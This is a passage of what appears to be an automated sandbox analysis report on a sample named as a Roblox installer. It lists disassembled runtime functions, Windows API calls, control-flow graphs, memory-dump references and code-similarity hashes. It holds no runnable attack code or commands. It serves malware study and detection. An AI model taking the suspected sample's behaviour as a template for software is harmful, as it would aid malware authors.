                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3664257935-537541572
                                                                                                  • Opcode ID: d7a8443095af15553a0119e237c3c3d71f89ec1c2afdfff78c862de573352fb9
                                                                                                  • Instruction ID: eeff6c8ca2483f2329264d2f079bb159ee625590470341c7237f2196ce6d7288
                                                                                                  • Opcode Fuzzy Hash: d7a8443095af15553a0119e237c3c3d71f89ec1c2afdfff78c862de573352fb9
                                                                                                  • Instruction Fuzzy Hash: E421BB71A01235ABC721DB64FC41A9E3FE8DB477A1F2446A4E919B7294DB30EE41C7E0
                                                                                                  Function 00B144F4 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 21 b144f4-b14501 call b2a316 24 b14541-b14544 ExitThread 21->24 25 b14503-b1450b 21->25 25->24 26 b1450d-b14511 25->26 27 b14513 call b2d03e 26->27 28 b14518-b1451e 26->28 27->28 30 b14520-b14522 28->30 31 b1452b-b14531 28->31 30->31 32 b14524-b14525 CloseHandle 30->32 31->24 33 b14533-b14535 31->33 32->31 33->24 34 b14537-b1453b FreeLibraryAndExitThread 33->34 34->24
                                                                                                  APIs
                                                                                                    • Part of subcall function 00B2A316: GetLastError.KERNEL32(00000000,?,00B0E677,00B2B9ED,?,?,00B2A212,00000001,00000364,?,00000006,000000FF,?,00B14464,00C3C1C8,0000000C), ref: 00B2A31A
                                                                                                    • Part of subcall function 00B2A316: SetLastError.KERNEL32(00000000), ref: 00B2A3BC
                                                                                                  • CloseHandle.KERNEL32(?,?,?,00B1462B,?,?,00B1449D,00000000), ref: 00B14525
                                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00B1462B,?,?,00B1449D,00000000), ref: 00B1453B
                                                                                                  • ExitThread.KERNEL32 ref: 00B14544
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 1991824761-0
                                                                                                  • Opcode ID: 61473d4df6a1d785b48d3e717edaf0a333d62991fed183132212eceef20549e9
                                                                                                  • Instruction ID: 5fa927e248280169bd604251c7f5535df998c47881baae60b7086e44e2f3f0a6
                                                                                                  • Opcode Fuzzy Hash: 61473d4df6a1d785b48d3e717edaf0a333d62991fed183132212eceef20549e9
                                                                                                  • Instruction Fuzzy Hash: F0F0FE30500710ABDB215B65CC0DA9A3ADAEF15361B984A90B865E75A0DF30DD82C791
                                                                                                  Function 00B2437B Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000002,?,00B24375,00B1466F,00B1466F,?,00000002,38E2E45B,00B1466F,00000002), ref: 00B2438C
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00B24375,00B1466F,00B1466F,?,00000002,38E2E45B,00B1466F,00000002), ref: 00B24393
                                                                                                  • ExitProcess.KERNEL32 ref: 00B243A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 0457bbe2d631ca25ae79982a67bfbbfc3b4e1805802a7071016436da191108fa
                                                                                                  • Instruction ID: c4cd84c632e01f7ea9309e270c8ca74cb8058dd4125b19f66def20c406526326
                                                                                                  • Opcode Fuzzy Hash: 0457bbe2d631ca25ae79982a67bfbbfc3b4e1805802a7071016436da191108fa
                                                                                                  • Instruction Fuzzy Hash: D1D09E31000714ABCF416FA0EC0EA993F65EF44342B1441A0B90D6B532CF7299929B84
                                                                                                  Function 00B2CACA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 42 b2caca-b2caf2 43 b2caf4-b2caf6 42->43 44 b2caf8-b2cafa 42->44 47 b2cb49-b2cb4c 43->47 45 b2cb00-b2cb07 call b2c9ff 44->45 46 b2cafc-b2cafe 44->46 49 b2cb0c-b2cb10 45->49 46->47 50 b2cb12-b2cb20 GetProcAddress 49->50 51 b2cb2f-b2cb46 49->51 50->51 52 b2cb22-b2cb2d call b2381c 50->52 53 b2cb48 51->53 52->53 53->47
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: [8
                                                                                                  • API String ID: 0-2721712938
                                                                                                  • Opcode ID: 0394f0e54f33fbc8129c310b43932e9e9d653d61de9067beb572ae916f89d1a3
                                                                                                  • Instruction ID: f5d3153398026b8936bf601bdab3ee094078fb118c3c8d2c74ad299cfa5080ec
                                                                                                  • Opcode Fuzzy Hash: 0394f0e54f33fbc8129c310b43932e9e9d653d61de9067beb572ae916f89d1a3
                                                                                                  • Instruction Fuzzy Hash: CC01F5336046359BDB269F6DFC49A5E3BDAEB893603244161F908DB15CDA31C801D791
                                                                                                  Function 00B1443F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(00C3C1C8,0000000C), ref: 00B14452
                                                                                                  • ExitThread.KERNEL32 ref: 00B14459
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorExitLastThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1611280651-0
                                                                                                  • Opcode ID: eb3b6bbc5a4889c2d3b723345e2699807264e6f8bb44b212122d252302c76951
                                                                                                  • Instruction ID: d6977efd527a4ac8ae054feb428d35ac5e6302b978163eb0224c49ff0937f351
                                                                                                  • Opcode Fuzzy Hash: eb3b6bbc5a4889c2d3b723345e2699807264e6f8bb44b212122d252302c76951
                                                                                                  • Instruction Fuzzy Hash: BFF0C271900711AFDB01BFB0D85AB6E3BB4EF45711F2045C8F015AB2A2CF305941CBA1
                                                                                                  Function 00B2A4B0 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 75 b2a4b0-b2a4b9 76 b2a4bb-b2a4ce RtlFreeHeap 75->76 77 b2a4e8-b2a4e9 75->77 76->77 78 b2a4d0-b2a4e7 GetLastError call b0e5d5 call b0e672 76->78 78->77
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,00B32F19,?,00000000,?,?,00B331BA,?,00000007,?,?,00B33665,?,?), ref: 00B2A4C6
                                                                                                  • GetLastError.KERNEL32(?,?,00B32F19,?,00000000,?,?,00B331BA,?,00000007,?,?,00B33665,?,?), ref: 00B2A4D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 485612231-0
